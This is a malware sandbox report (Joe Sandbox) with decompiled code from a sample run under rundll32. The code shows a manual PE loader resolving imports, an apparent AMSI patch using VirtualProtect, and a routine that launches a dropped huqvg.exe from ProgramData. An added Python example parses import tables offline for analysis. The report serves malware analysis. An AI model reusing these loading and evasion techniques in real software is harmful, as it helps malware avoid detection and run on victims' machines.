    control_flow_graph 338 119190d-1191924 IsBadReadPtr 340 119192a-1191931 338->340 341 1191ae3-1191ae9 338->341 340->341 342 1191937-119194e call 1191af0 340->342 344 1191950-119195a 342->344 345 119195c-119196b SetLastError 344->345 346 1191970-1191985 call 1191170 344->346 345->341 348 119198a-1191994 346->348 349 11919c0-11919f0 348->349 350 1191996-11919bb SetLastError 348->350 351 1191a0b-1191a20 349->351 352 11919f2-1191a09 349->352 350->341 353 1191a23 351->353 352->353 355 1191a37-1191a3d 353->355 356 1191ab8-1191abc 355->356 357 1191a3f-1191a4a 355->357 358 1191ade 356->358 359 1191abe-1191adc SetLastError 356->359 360 1191a4c-1191a73 357->360 361 1191a75-1191aa0 357->361 358->341 359->341 365 1191aa2-1191aa8 360->365 361->365 366 1191aaa-1191ab1 365->366 367 1191ab3 365->367 366->356 367->355
    C-Code - Quality: 37%
    			E0119190D() { // import-table builder; frame: [ebp-4] IMAGE_IMPORT_DESCRIPTOR*, [ebp-8] thunk cursor, [ebp-0xc] code base, [ebp-0x10] IAT slot, [ebp-0x14] DLL handle, [ebp-0x18] result, [ebp-0x20] grown module list; [ebp+8] loader context (+8 module list, +0xc count, +0x1c loadLibrary, +0x20 getProcAddress, +0x24 freeLibrary, +0x28 user data)
    				intOrPtr _t95;
    				intOrPtr _t99;
    				intOrPtr _t102;
    				intOrPtr _t118;
    				intOrPtr _t123;
    				void* _t179;
    				void* _t181;
    				void* _t183;
    				void* _t184;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t179 - 4) =  *(_t179 - 4) + 0x14; // next descriptor; sizeof(IMAGE_IMPORT_DESCRIPTOR) == 0x14
    					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) { // unreadable descriptor or Name RVA == 0: end of table
    						break;
    					}
    					L3:
    					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
    					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed; loadLibrary(codeBase + Name, userdata), a LoadLibraryA wrapper such as E01191AF0 below
    					_t183 = _t181 + 8;
    					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
    					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
    						L5:
    						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    						_t102 = E01191170( *_t21, 4 +  *_t17 * 4); // executed; grow the module-handle list by one entry (realloc-like)
    						_t184 = _t183 + 8;
    						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
    						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
    							L7:
    							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
    							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14)); // remember the handle so it can be freed on unload
    							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;
    							if( *( *(_t179 - 4)) == 0) { // OriginalFirstThunk == 0: walk FirstThunk itself
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10)); // cursor = codeBase + FirstThunk
    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10)); // IAT slot = codeBase + FirstThunk
    							} else {
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4)); // cursor = codeBase + OriginalFirstThunk
    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10)); // IAT slot = codeBase + FirstThunk
    							}
    							L12:
    							while( *( *(_t179 - 8)) != 0) { // zero thunk ends the list
    								if(( *( *(_t179 - 8)) & 0x80000000) == 0) { // IMAGE_ORDINAL_FLAG32 clear: import by name
    									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8)); // codeBase + RVA of IMAGE_IMPORT_BY_NAME
    									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77); // getProcAddress(handle, &Name[0] (skips the 2-byte Hint), userdata)
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118; // write the resolved address into the IAT slot
    								} else { // import by ordinal: low 16 bits
    									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
    								}
    								L16:
    								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
    									L18:
    									L11:
    									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]); // next thunk
    									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4; // next IAT slot
    									continue;
    								} else {
    									L17:
    									 *((intOrPtr*)(_t179 - 0x18)) = 0; // unresolved import: fail
    								}
    								break;
    							}
    							L19:
    							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
    								L21:
    								continue;
    							} else {
    								L20:
    								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87); // freeLibrary(handle, userdata)
    								SetLastError(0x7f); // ERROR_PROC_NOT_FOUND
    							}
    						} else {
    							L6:
    							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25); // freeLibrary(handle, userdata)
    							SetLastError(0xe); // ERROR_OUTOFMEMORY
    							 *((intOrPtr*)(_t179 - 0x18)) = 0;
    						}
    					} else {
    						L4:
    						SetLastError(0x7e); // ERROR_MOD_NOT_FOUND
    						 *((intOrPtr*)(_t179 - 0x18)) = 0;
    					}
    					break;
    				}
    				L22:
    				_t95 =  *((intOrPtr*)(_t179 - 0x18));
    				return _t95;
    			}
    
    0x0119190d
    0x0119190d
    0x0119190d
    0x01191913
    0x01191924
    0x00000000
    0x00000000
    0x01191937
    0x0119193a
    0x0119194b
    0x0119194e
    0x01191950
    0x01191953
    0x0119195a
    0x01191970
    0x01191973
    0x01191981
    0x01191985
    0x0119198a
    0x0119198d
    0x01191994
    0x011919c0
    0x011919c6
    0x011919cc
    0x011919d2
    0x011919d8
    0x011919de
    0x011919e7
    0x011919f0
    0x01191a14
    0x01191a20
    0x011919f2
    0x011919fa
    0x01191a06
    0x01191a06
    0x00000000
    0x01191a37
    0x01191a4a
    0x01191a7d
    0x01191a83
    0x01191a95
    0x01191a98
    0x01191a9a
    0x01191aa0
    0x01191a4c
    0x01191a4f
    0x01191a66
    0x01191a69
    0x01191a6b
    0x01191a71
    0x01191a71
    0x01191aa2
    0x01191aa8
    0x01191ab3
    0x01191a25
    0x01191a2b
    0x01191a34
    0x00000000
    0x01191aaa
    0x01191aaa
    0x01191aaa
    0x01191aaa
    0x00000000
    0x01191aa8
    0x01191ab8
    0x01191abc
    0x01191ade
    0x00000000
    0x01191abe
    0x01191abe
    0x01191ac1
    0x01191acc
    0x01191acf
    0x01191ad6
    0x01191ad6
    0x01191996
    0x01191996
    0x01191999
    0x011919a4
    0x011919a7
    0x011919ae
    0x011919b4
    0x011919b4
    0x0119195c
    0x0119195c
    0x0119195e
    0x01191964
    0x01191964
    0x00000000
    0x0119195a
    0x01191ae3
    0x01191ae3
    0x01191ae9

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0119191C
    • SetLastError.KERNEL32(0000007E), ref: 0119195E
    • SetLastError.KERNEL32(0000000E), ref: 011919AE
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: cf5b33e84e0a81aa6e6959ae18ac4b5670eb398fe7318fd0ef9f8f15333516b1
    • Instruction ID: a0a5ad8ece6fbb833eecc1f653db9957c191104e34b96774873a970715b3908c
    • Opcode Fuzzy Hash: cf5b33e84e0a81aa6e6959ae18ac4b5670eb398fe7318fd0ef9f8f15333516b1
    • Instruction Fuzzy Hash: 90011D74A00109EFDF18CF94C545BAEB7B1FF44314F248158E915AB241C774EE80DB91
    Uniqueness

    Uniqueness Score: -1.00%

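Added worked example (editor's note; not sandbox output and not code from the sample): a Python walk of an import table in the same order as E0119190D above, with the loader's three callbacks (loadLibrary at context+0x1c, getProcAddress at +0x20, freeLibrary at +0x24) replaced by Python callables so the two failure paths and their SetLastError values (0x7e ERROR_MOD_NOT_FOUND, 0x7f ERROR_PROC_NOT_FOUND) can be exercised offline. The 8 KiB image, the DLL names, ordinal 115 and the fake export addresses are constructed; the module-list realloc (the 0xe ERROR_OUTOFMEMORY path) is not modelled.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
# SetLastError values used by the decompiled loader
ERROR_OUTOFMEMORY = 0x0e
ERROR_MOD_NOT_FOUND = 0x7e
ERROR_PROC_NOT_FOUND = 0x7f

# IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk (0x14 bytes)
IMPORT_DESCRIPTOR = struct.Struct("<IIIII")


def read_cstr(image, rva):
    return image[rva:image.index(b"\0", rva)].decode("ascii")


def walk_imports(image, import_dir_rva):
    """Enumerate the import table the way E0119190D does: one descriptor per DLL until the
    Name RVA is 0; per DLL, the thunk array at OriginalFirstThunk (or FirstThunk when that is 0,
    the `*( *(_t179 - 4)) == 0` branch) until a zero entry.  An entry with the high bit set is
    an ordinal (low 16 bits); otherwise it is the RVA of IMAGE_IMPORT_BY_NAME and the name
    starts 2 bytes in, after the hint.  Returns [(dll, [(iat_slot_rva, name_or_ordinal), ...])]."""
    result, off = [], import_dir_rva
    while off + IMPORT_DESCRIPTOR.size <= len(image):
        oft, _ts, _fwd, name_rva, ft = IMPORT_DESCRIPTOR.unpack_from(image, off)
        if name_rva == 0:
            break
        thunk, slot, entries = (oft or ft), ft, []
        while True:
            entry = struct.unpack_from("<I", image, thunk)[0]
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                entries.append((slot, entry & 0xFFFF))
            else:
                entries.append((slot, read_cstr(image, entry + 2)))
            thunk, slot = thunk + 4, slot + 4
        result.append((read_cstr(image, name_rva), entries))
        off += IMPORT_DESCRIPTOR.size
    return result


def resolve_imports(image, import_dir_rva, load_library, get_proc_address, free_library):
    """Outcome of E0119190D with its three callbacks swapped for Python callables.
    Returns (ok, last_error, iat) where iat maps each FirstThunk slot RVA to the address
    that would be written there.  A missing DLL stops with ERROR_MOD_NOT_FOUND; a missing
    export frees that DLL and stops with ERROR_PROC_NOT_FOUND, leaving earlier slots filled."""
    iat = {}
    for dll, entries in walk_imports(image, import_dir_rva):
        handle = load_library(dll)
        if not handle:
            return False, ERROR_MOD_NOT_FOUND, iat
        for slot, target in entries:
            addr = get_proc_address(handle, target)
            if not addr:
                free_library(handle)
                return False, ERROR_PROC_NOT_FOUND, iat
            iat[slot] = addr
    return True, 0, iat


def build_sample_image():
    """Constructed 8 KiB image (not the analysed DLL) with an import directory at RVA 0x1000:
    KERNEL32.dll imported by name with an OriginalFirstThunk array, WS2_32.dll imported by
    ordinal through FirstThunk only."""
    img = bytearray(0x2000)

    def put(rva, data):
        img[rva:rva + len(data)] = data

    put(0x1100, b"KERNEL32.dll\0")
    put(0x1110, b"WS2_32.dll\0")
    put(0x1200, struct.pack("<H", 0) + b"Sleep\0")          # IMAGE_IMPORT_BY_NAME: Hint, Name
    put(0x1210, struct.pack("<H", 0) + b"VirtualAlloc\0")
    put(0x1300, struct.pack("<III", 0x1200, 0x1210, 0))     # KERNEL32 OriginalFirstThunk
    put(0x1400, struct.pack("<III", 0x1200, 0x1210, 0))     # KERNEL32 FirstThunk (the IAT that gets patched)
    put(0x1500, struct.pack("<II", IMAGE_ORDINAL_FLAG32 | 115, 0))  # WS2_32 IAT, ordinal only
    put(0x1000, IMPORT_DESCRIPTOR.pack(0x1300, 0, 0, 0x1100, 0x1400)
        + IMPORT_DESCRIPTOR.pack(0, 0, 0, 0x1110, 0x1500)
        + bytes(IMPORT_DESCRIPTOR.size))                  # all-zero terminator
    return bytes(img)


# Fake export tables standing in for LoadLibraryA/GetProcAddress; the addresses are made up.
FAKE_EXPORTS = {
    "KERNEL32.dll": {"Sleep": 0x77E01000, "VirtualAlloc": 0x77E02000},
    "WS2_32.dll": {115: 0x75A00100},
}


def demo():
    """Returns (imports, full_result, partial_result, freed_handles) for the sample image."""
    image = build_sample_image()
    freed = []
    load = lambda dll: dll if dll in FAKE_EXPORTS else None
    full = resolve_imports(image, 0x1000, load,
                           lambda h, t: FAKE_EXPORTS[h].get(t, 0), freed.append)
    # the same image against a KERNEL32 that lacks VirtualAlloc: the handle is freed, 0x7f is set
    partial = resolve_imports(image, 0x1000, load,
                              lambda h, t: 0 if t == "VirtualAlloc" else FAKE_EXPORTS[h].get(t, 0),
                              freed.append)
    return walk_imports(image, 0x1000), full, partial, freed


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Run against a real mapped image (for example the module dumped at 0x1190000 above, with the import directory RVA taken from OptionalHeader.DataDirectory[1]) the same walk lists what the payload will resolve at load time, which is the quickest way to see the API surface of a manually mapped stage without executing it.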
    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 370 1181d10-1181d1d 371 1181d29-1181d35 370->371 372 1181d1f-1181d24 370->372 374 1181d9d-1181da9 371->374 375 1181d37-1181d42 371->375 373 1181e71-1181e74 372->373 378 1181dab-1181db2 374->378 379 1181db4 374->379 376 1181d93-1181d98 375->376 377 1181d44-1181d4b 375->377 376->373 381 1181d4d-1181d5b 377->381 382 1181d6f-1181d8e call 1181820 377->382 380 1181dbb-1181dcd 378->380 379->380 383 1181dd8 380->383 384 1181dcf-1181dd6 380->384 381->382 385 1181d5d-1181d6d 381->385 387 1181d90 382->387 386 1181ddf-1181df1 383->386 384->386 385->376 385->382 388 1181dfc 386->388 389 1181df3-1181dfa 386->389 387->376 390 1181e03-1181e2e 388->390 389->390 391 1181e3c-1181e59 VirtualProtect 390->391 392 1181e30-1181e39 390->392 393 1181e5b-1181e6a call 1181b20 391->393 394 1181e6c 391->394 392->391 393->373 394->373
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 984b9021d3d393601abb29a9b3e196bc9194cf8d0190172f9ce7e7d42a9b0900
    • Instruction ID: 066a3092ac03e1d525e9862c7e65845d077e9979bb73819b05c883d04e9bb6ad
    • Opcode Fuzzy Hash: 984b9021d3d393601abb29a9b3e196bc9194cf8d0190172f9ce7e7d42a9b0900
    • Instruction Fuzzy Hash: E741DC75600109AFDB09EF48C494BAEB7B2FB88314F14C659E8195F355C775EA82CF80
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 398 1191af0-1191b05 LoadLibraryA 399 1191b0b 398->399 400 1191b07-1191b09 398->400 401 1191b0e-1191b11 399->401 400->401
    C-Code - Quality: 100%
    			E01191AF0(void* __ecx, CHAR* _a4) {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _t6;
    
    				_t6 = LoadLibraryA(_a4); // executed
    				_v8 = _t6;
    				if(_v8 != 0) {
    					return _v8;
    				}
    				return 0;
    			}
    
    0x01191af8
    0x01191afe
    0x01191b05
    0x00000000
    0x01191b0b
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 01191AF8
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 9e5e95ccbc50b1846e547597d6ace6dcbec411cda637add383fe74853126e880
    • Instruction ID: f8d969d39a5b1997213698625e5910e5dafee96a4acf85ead5ff08d22ca1526f
    • Opcode Fuzzy Hash: 9e5e95ccbc50b1846e547597d6ace6dcbec411cda637add383fe74853126e880
    • Instruction Fuzzy Hash: B8D09E7491520DFBCF14DEA4D54955977B8E708261F104594E81A93204E6319E809A91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01191140(void* __ecx, long _a4) { // allocation callback used by the loader: fresh RW memory of the requested size
    				void* _v8;
    				void* _t5;
    
    				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed; MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE
    				_v8 = _t5;
    				return _v8;
    			}
    
    0x01191151
    0x01191157
    0x01191160

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011911A1,00003000,00000004,00000004,?,011911A1,?), ref: 01191151
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 55365d9f391b0724cb139ffacbd962182b41090ecc177886234312e285e33eec
    • Instruction ID: 6fbfee506749483c16d6514154a3fdcfbf28a862b8f6bfe044fe0ba0efe07f96
    • Opcode Fuzzy Hash: 55365d9f391b0724cb139ffacbd962182b41090ecc177886234312e285e33eec
    • Instruction Fuzzy Hash: 15D0C974645208BBE714CA94D806F69BBACE704611F000194FE189B280D5B16E408791
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 408 11819f0-1181a10 VirtualAlloc
    APIs
    • VirtualAlloc.KERNELBASE(00000000,01181A51,00003000,00000004,000000BE,?,01181A51,?), ref: 01181A01
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 8c33c389b19e2db5b4dedb14a6e6bb0fddb0c5866bcbb382ca7211369f8d32dc
    • Instruction ID: 9123b34c5dfbd511595d3243a7ebdbee0d3e0d4b7c9c3000c9ebc8637a2ccbf8
    • Opcode Fuzzy Hash: 8c33c389b19e2db5b4dedb14a6e6bb0fddb0c5866bcbb382ca7211369f8d32dc
    • Instruction Fuzzy Hash: 22D0C9B4645208BBE714CA84D806F6DBBACE704A11F004195FE089B280D5B1AE0057A5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 0118182F
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: b690a5414f2537f5be9a989ee1aabbdc63912484a82892f638aeb1c3f1641515
    • Instruction ID: 4eab7fc4b613ec6c49432f41034d068b610a70ad0b36fb10684601b302ac70b0
    • Opcode Fuzzy Hash: b690a5414f2537f5be9a989ee1aabbdc63912484a82892f638aeb1c3f1641515
    • Instruction Fuzzy Hash: BDC04C7611430CAB8B04DF98E884DAB37ADBB8CA10B14C518BA2D87204C730F9518BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011814DB
    • SetLastError.KERNEL32(0000007F), ref: 01181507
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 2b64351a07898a03ac884c32759aa303be9b89b52cd85c7a48e500c92c3ebc65
    • Instruction ID: 6e965b40331f70658bbea86a50e74c44ef16665140c7d4360a8728037774d428
    • Opcode Fuzzy Hash: 2b64351a07898a03ac884c32759aa303be9b89b52cd85c7a48e500c92c3ebc65
    • Instruction Fuzzy Hash: 1E71D875E10109EFCB08EF98C590AADB7B2FF48304F648598D456AB345D774EA82CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E011B12B0() { // launches the dropped file
    				signed int _v8;
    				void _v40;
    				void* _v52;
    				void* _v56;
    				char _v124;
    				int _t23;
    				void* _t32;
    				void* _t37;
    				signed int _t40;
    
    				_v8 =  *0x11b3004 ^ _t40; // stack cookie
    				 *0x11b3028( &_v124, 0, 0x44, _t32, _t37); // IAT slot used like memset(): zero a 0x44-byte STARTUPINFOA
    				 *0x11b3028( &_v56, 0, 0x10); // zero a 0x10-byte PROCESS_INFORMATION
    				_v124 = 0x44; // STARTUPINFOA.cb
    				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
    				asm("movsw");
    				asm("movsb");
    				 *0x11b3018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56); // IAT slot; the ten arguments match CreateProcessA(lpApplicationName, NULL, NULL, NULL, FALSE, 0, NULL, "C:\\", &si, &pi) (inference from the call shape, the import is not named on this page)
    				CloseHandle(_v56); // hProcess
    				_t23 = CloseHandle(_v52); // hThread; the child is left running
    				E011B1A04(); // stack-cookie check
    				return _t23;
    			}
    
    0x011b12bd
    0x011b12ca
    0x011b12db
    0x011b12e4
    0x011b12f8
    0x011b12fa
    0x011b12fc
    0x011b131a
    0x011b1324
    0x011b132e
    0x011b133b
    0x011b1343

    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: 2ae4637f4ceda772a28da5a89def28bec0bda3bd989d888adb9bc1e8e0ed4637
    • Instruction ID: 0ba15bc034bb2bf40361cee484e988d333a5fffb60e72774cab2eac3bb5708de
    • Opcode Fuzzy Hash: 2ae4637f4ceda772a28da5a89def28bec0bda3bd989d888adb9bc1e8e0ed4637
    • Instruction Fuzzy Hash: D2018471A14208BBDB28EBA4D989FDE7779FF4C704F100428FA15A7180D7757A58CB51
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LoadLibraryExA.KERNEL32(01184070,00000000,00000800), ref: 011825F9
    • GetProcAddress.KERNEL32(00000000,01184078), ref: 01182615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 01182650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 01182671
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: fb821300e382cbd3378ac708d6e4a720a16f6652a9227e8b8d433512c88c85f3
    • Instruction ID: 9ad89c5d88709a6a05f0e7b48afd091b6f21672bc4781ccd8e52743aa710d394
    • Opcode Fuzzy Hash: fb821300e382cbd3378ac708d6e4a720a16f6652a9227e8b8d433512c88c85f3
    • Instruction Fuzzy Hash: 92111CB4E00209EFCB19DFD4C849BAEBBB4FB48704F208559EA1167340D7B4AA45CF55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01191FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    				signed short* _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _t82;
    				void* _t124;
    
    				_v40 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v12 =  *_t3;
    				_v16 = 0;
    				_v32 =  *_a4 + 0x78;
    				if( *((intOrPtr*)(_v32 + 4)) != 0) {
    					_v8 = _v12 +  *_v32;
    					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
    						SetLastError(0x7f);
    						return 0;
    					} else {
    						if((_a8 >> 0x00000010 & 0xffff) != 0) {
    							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20));
    							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24));
    							_v36 = 0;
    							_v20 = 0;
    							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) {
    								_t82 = E011911E0(_a8, _v12 +  *_v24);
    								_t124 = _t124 + 8;
    								if(_t82 != 0) {
    									_v20 = _v20 + 1;
    									_v24 = _v24 + 4;
    									_v28 =  &(_v28[1]);
    									continue;
    								}
    								_v16 =  *_v28 & 0x0000ffff;
    								_v36 = 1;
    								break;
    							}
    							if(_v36 != 0) {
    								L17:
    								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) {
    									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4));
    								}
    								SetLastError(0x7f);
    								return 0;
    							}
    							SetLastError(0x7f);
    							return 0;
    						}
    						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
    							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
    							goto L17;
    						}
    						SetLastError(0x7f);
    						return 0;
    					}
    				}
    				SetLastError(0x7f);
    				return 0;
    			}
    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,01191039,00000000), ref: 01191FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,01191039,00000000), ref: 01192004
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 51582c3cdb4d9d18e3c3b966280abcaaf8039ca54f8e33399929ae064e118ed4
    • Instruction ID: 9305394e66a3e7f7c766ad249c40856952fb4e9a5b03cf131201ca77269a1dbc
    • Opcode Fuzzy Hash: 51582c3cdb4d9d18e3c3b966280abcaaf8039ca54f8e33399929ae064e118ed4
